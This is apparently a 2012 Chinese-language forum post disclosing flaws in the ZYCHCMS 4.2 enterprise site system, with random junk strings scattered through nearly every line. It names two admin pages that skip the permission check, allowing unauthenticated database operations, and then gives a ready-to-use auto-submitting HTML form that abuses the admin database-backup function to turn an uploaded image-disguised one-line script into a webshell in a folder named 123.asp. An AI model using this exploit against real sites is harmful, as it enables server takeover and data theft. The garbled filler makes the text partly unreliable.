/ d9 W( [- @$ M- P+ P
. X6 B. g+ E; E0 n1 @8 b; n8 t
$ U ~+ ]% |4 k* l; X8 L
/ @* T, A8 V6 n% A影响版本:ZYCHCMS企业网站管理系统4.2(存在以下两个文件的版本应该是通杀)
& W* e h4 l; X* p- p ①SQL注射漏洞! }4 h/ Y2 E& u. [
漏洞文件:/admin/add_js.asp & /admin/add_xm_jiang.asp4 U. [7 ?2 W6 ^; c
漏洞原因:未过滤, b- I1 v' [$ z% V
漏洞代码:
$ m3 w" O3 _& b" o3 C/ r 都是相同的,文件开头没有调用过滤文件/admin/seeion.asp,导致没有对当前权限进行判断,就直接操作数据库。: f+ Z+ D4 \3 T1 i) u( h
修复方法:在文件开头加入代码
. ~. w* P1 d) G% h9 e7 s: J- [, n , B1 v6 ^+ V N' i2 R, ^
# t+ ]& I1 F* e- |9 U6 B6 c% ^; q9 ]
②后台拿WBSHELL
4 J* B% c- I6 U0 N \ 进入后台有一个数据库备份,可以通过本地提交突破创建.asp后缀文件夹,并将一句话备份进去。
) q9 g* t: B2 ~! j3 F7 ]" V- I 这里在网上找了一个,改了下,将就着用。) r* z( o ^& L$ b$ V1 v# q; K% S5 |
以下是代码本地提交代码' I! P! m% d6 M1 f( M
' ]/ f+ Q' |* z$ e
& }; T! v8 q, K<form method=”post” action=”http://localhost/admin/Manage_backup.asp?action=Backup” name=add>" l8 `+ ^- P, K/ G7 {
<!–eg:http://127.0.0.1:99/admin/Manage_backup.asp?action=Backup–>* ~6 D! {, K9 A0 `8 s$ Z
<tr>
6 Y4 g7 _; V' j6 r) v' x$ v/ ~; Y <td height=”30″ background=”images/bg_list.gif”><div style=”padding-left:10px; font-weight:bold; color:#FFFFFF; text-align:left”>备份数据库</div></td>
! W9 p4 J# T8 E9 r </tr>) @, e6 u; n# d; [
<tr>
N$ x9 F: H4 z! a <td bgcolor=”#FFFFFF”><span class=”back_southidc”> q7 H, @6 ~( x3 X* p5 b- ]
</span>
+ [) x. h/ k& C <table width=”100%” border=”0″ align=”center” cellpadding=”5″ cellspacing=”0″ >; n9 C. G' X1 r/ h
<tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″ >
" T9 M8 D8 r' c6 j' L% M <td height=”25″ width=”30%” class=”td”><div align=”left”>当前数据库路径</div></td>, K4 g+ W9 h; w. Q4 A4 |
<td width=”70%” class=”td”>90sec. K5 L9 v8 S8 d
9 m' J7 } s% f( X <div align=”left”>( O4 e) o5 p6 e( B3 {( Z, y
<input type=”text” size=”30″ name=”DBpath” value=”此处为你在其网站上传的图片格式一句话路径” />3 D, _: K1 q; W7 R
<!–eg:../uploadfile/image/Logo/20120803130885328532_ZYCH.jpg>/ O1 p1 ^& {6 V" Q! N
<input type=”hidden” size=”50″ name=”bkfolder” value=”123.asp” />
& U K1 f! C2 D* P </div></td>
# M9 `% D3 m5 R x3 p1 B4 p </tr>
, a7 W2 E: `! r7 @ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#FFFFFF’” bgcolor=”#FFFFFF”>
! ] T0 S: d: V& |/ w1 l. E/ j <td height=”25″ width=”30%” class=”td”><div align=”left”>备份数据库名称</div></td>
" g9 Q2 ~' X+ m% Q; l <td class=”td”><div align=”left”>
: P4 c% i2 P- E9 j/ b. \ <input type=”text” size=”30″ name=”bkDBname” value=”4.mdb” />. j+ T+ F: d: I, H) V
[如备份目录有该文件,将覆盖,如沒有,将自动创建]</div></td>
* C$ x3 E1 B' D% |$ a- b$ _/ K </tr>
' s: H4 J- n0 D2 ~% I% ^ <tr onmouseover=”style.backgroundColor=’#EEEEEE’” onmouseout=”style.backgroundColor=’#F1F5F8′” bgcolor=”#F1F5F8″>
E$ s0 \8 u! |! T! F0 f1 ? <td height=”25″ width=”30%” class=”td”><div align=”left”></div></td>
' K. p7 W. L/ [& ~8 X& @9 W/ A: G; f1 j' ` <td class=”td”><div align=”left”>
: H& n- b& ~6 H4 N# x <input type=”submit” value=”确定备份” class=”btn”, A: c; T# ?5 Q& u% f5 k
</div></td>. t/ l9 X5 s3 B9 ?
</tr>8 V8 i0 H3 ~) @3 M; r& v& `
</table></td></tr></form>
7 k. ^, ~3 f: \. K7 L6 Y </table>; A: N0 N9 q. ^
</td>- g1 b$ D: ^) H$ X2 @4 L
</tr>3 t/ D# i8 B$ N* H/ H# Q9 e
</table>
% I7 A8 o" J) i: Q6 R8 f <script>
/ e( F1 B- M- M. g5 A document.all.add.submit();
: U& T/ H& O: q( V$ c- n( |, o </script>* {' W. c# e- y% w. s/ d
S, R9 ]1 J# p. Y* N+ v
7 F6 ^, D4 y7 A6 y* U3 C" E; L: S7 B$ A
* ?- D$ `" b& G
/ N. W+ V- T+ L/ p: Q) G& L9 P3 E% J& w5 W1 s
! k: b2 m* E9 x: m0 j+ F$ a/ Z2 d
6 k7 }8 O0 }1 } K/ y- o/ J
; ~# T: N' D1 B& q3 ^" a$ O. F" N3 F2 j) R6 h9 a0 n
|
发表于 2012-9-10 21:09:51
收藏
支持
反对